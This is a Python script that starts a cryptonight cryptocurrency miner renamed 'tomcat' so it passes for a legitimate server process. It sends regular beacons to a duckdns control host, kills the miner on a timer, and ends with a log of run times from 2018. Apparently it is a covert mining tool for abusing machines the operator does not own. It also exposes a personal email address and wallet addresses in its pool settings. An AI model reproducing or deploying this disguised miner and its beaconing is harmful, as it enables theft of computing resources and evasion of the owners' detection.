import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:57:04.018638
#2018-02-17 16:44:02.098887
#2018-02-17 18:32:08.006053
#2018-02-17 20:20:04.188515
#2018-02-17 22:07:03.753438
#2018-02-17 23:50:07.135474
#2018-02-18 01:39:05.312715
#2018-02-18 03:26:05.005918
#2018-02-18 05:13:06.080446
#2018-02-18 07:06:01.340911
#2018-02-18 08:54:05.577579
#2018-02-18 10:41:08.122022
#2018-02-18 12:27:05.535235
#2018-02-18 14:15:08.501649
#2018-02-18 16:08:04.153042
#2018-02-18 17:56:07.070213
#2018-02-18 19:43:04.388000
#2018-02-18 21:28:01.508210
#2018-02-18 23:16:07.434409
#2018-02-19 01:03:04.095791
#2018-02-19 02:50:07.160306
#2018-02-19 04:37:01.674265
#2018-02-19 06:21:07.303081
#2018-02-19 08:09:07.675355
#2018-02-19 09:59:05.060529
#2018-02-19 11:48:07.637467
#2018-02-19 13:33:09.252907
#2018-02-19 15:22:05.504669
#2018-02-19 17:10:08.694543
#2018-02-19 18:58:09.035941
#2018-02-19 20:44:01.667126
#2018-02-19 22:31:06.710190
#2018-02-20 00:16:04.990587
#2018-02-20 02:04:04.507453
#2018-02-20 03:54:01.325051
#2018-02-20 05:38:07.621840
#2018-02-20 07:23:03.538911
#2018-02-20 09:09:04.654308
#2018-02-20 10:52:06.862521
#2018-02-20 12:39:08.723582
#2018-02-20 14:25:04.848438
#2018-02-20 16:09:08.450184
#2018-02-20 17:54:09.123504
#2018-02-20 19:46:04.260066
#2018-02-20 21:34:07.833967
#2018-02-20 23:17:04.191708
#2018-02-21 01:02:08.518337
#2018-02-21 02:48:06.647495
#2018-02-21 04:32:01.614865
#2018-02-21 06:21:03.624714
#2018-02-21 08:06:07.154857
#2018-02-21 09:52:06.178552
#2018-02-21 11:42:01.763396
#2018-02-21 13:32:01.510477
#2018-02-21 15:18:07.092080
#2018-02-21 17:08:01.991075
#2018-02-21 18:54:06.780074
#2018-02-21 20:43:07.298815
#2018-02-21 22:28:01.413131
#2018-02-22 00:17:02.960495
#2018-02-22 02:07:05.292354
#2018-02-22 03:52:05.115790
#2018-02-22 05:38:04.022819
#2018-02-22 07:22:06.529607
#2018-02-22 09:09:03.939660
#2018-02-22 10:57:08.472182
#2018-02-22 12:43:05.101200
#2018-02-22 14:29:05.920711
#2018-02-22 16:16:01.354781
#2018-02-22 18:02:01.939526
#2018-02-22 19:53:02.058792
#2018-02-22 21:41:07.756362
#2018-02-22 23:28:07.984637
#2018-02-23 01:18:04.116840
#2018-02-23 03:04:01.985092
#2018-02-23 04:49:02.117477
#2018-02-23 06:35:08.436369
#2018-02-23 08:23:01.983205
#2018-02-23 10:39:01.343995
#2018-02-23 12:32:09.738445
#2018-02-23 14:20:01.624173
#2018-02-23 16:10:09.150118
#2018-02-23 17:55:08.014227
#2018-02-23 19:42:08.890467
#2018-02-23 21:25:05.861050
#2018-02-23 23:13:07.580706
#2018-02-24 01:03:02.149287
#2018-02-24 02:55:08.159427
#2018-02-24 04:45:05.345452
#2018-02-24 06:34:04.722037
#2018-02-24 08:23:04.316716
#2018-02-24 10:07:06.922996
#2018-02-24 12:04:06.110477
#2018-02-24 13:51:04.968085
#2018-02-24 15:38:07.548487
#2018-02-24 17:33:05.300141
#2018-02-24 19:19:01.513255
#2018-02-24 21:08:01.260600
#2018-02-24 23:41:07.202307
#2018-02-25 03:02:01.379351
#2018-02-25 07:09:05.357552